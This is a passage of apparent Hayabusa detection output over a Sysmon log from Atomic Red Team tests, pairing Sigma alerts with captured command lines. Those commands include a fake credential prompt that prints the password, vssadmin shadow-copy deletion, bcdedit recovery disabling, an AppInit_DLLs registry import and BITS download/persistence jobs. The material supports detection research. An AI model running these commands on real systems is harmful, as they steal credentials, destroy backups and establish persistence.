Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll : Path: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:46:51.957 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 
+09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe delete shadows /all /quiet : Path: C:\Windows\System32\vssadmin.exe 
: User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wbadmin.exe delete catalog -quiet : Path: C:\Windows\System32\wbadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog 
-quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wbengine.exe"" : Path: C:\Windows\System32\wbengine.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\vds.exe : Path: C:\Windows\System32\vds.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy 
ignoreallfailures"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} recoveryenabled no : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled 
no""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground 
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /create AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md 
C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: 
